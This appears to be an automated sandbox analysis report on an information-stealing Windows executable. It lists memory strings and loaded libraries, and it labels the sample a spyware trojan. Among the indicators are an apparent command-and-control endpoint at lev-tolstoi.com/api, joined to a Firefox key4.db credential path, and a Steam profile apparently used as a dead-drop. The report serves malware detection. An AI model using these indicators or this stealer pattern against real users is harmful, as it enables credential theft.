Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3019711227.000000000142A000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042608843.0000000001435000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001426000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075806149.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042684703.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075561492.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075431589.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042472090.000000000142A000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081493922.0000000001443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181401742.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/4
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2695354440.00000000013E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/9
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3075806149.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075561492.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075431589.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081493922.0000000001443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/A
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Q
                Source: 6GNqkkKY0j.exe, 00000000.00000002.3081414625.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3080379491.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181401742.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3002699637.0000000001423000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3075064425.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075375880.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3080379491.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api4&
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181401742.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/ee
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3042608843.0000000001435000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075806149.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042684703.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075561492.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075431589.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181401742.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042472090.000000000142A000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081493922.0000000001443000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi9
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3042472090.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3019711227.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075523758.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3024468196.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081527231.0000000001452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2397441650.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397503538.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3019711227.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apizchhhv.default-release/key4.dbPK
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: 6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

                System Summary

                barindex
                Source: 6GNqkkKY0j.exeStatic PE information: section name:
                Source: 6GNqkkKY0j.exeStatic PE information: section name: .rsrc
                Source: 6GNqkkKY0j.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CFE0_3_013F7CFE
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CFE0_3_013F7CFE
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CFE0_3_013F7CFE
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CE00_3_013F7CE0
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CE00_3_013F7CE0
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CE00_3_013F7CE0
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CFE0_3_013F7CFE
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CFE0_3_013F7CFE
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CFE0_3_013F7CFE
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CE00_3_013F7CE0
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CE00_3_013F7CE0
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CE00_3_013F7CE0
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CFE0_3_013F7CFE
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CFE0_3_013F7CFE
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CFE0_3_013F7CFE
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CE00_3_013F7CE0
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CE00_3_013F7CE0
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeCode function: 0_3_013F7CE00_3_013F7CE0
                Source: 6GNqkkKY0j.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 6GNqkkKY0j.exeStatic PE information: Section: ZLIB complexity 0.9994510825163399
                Source: 6GNqkkKY0j.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 6GNqkkKY0j.exe, 00000000.00000003.2696888589.0000000005CBE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2399004098.0000000005CBE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398888639.0000000005CD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 6GNqkkKY0j.exeVirustotal: Detection: 52%
                Source: 6GNqkkKY0j.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | File read: C:\Users\user\Desktop\6GNqkkKY0j.exe
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe | Section loaded: cryptbase.dll
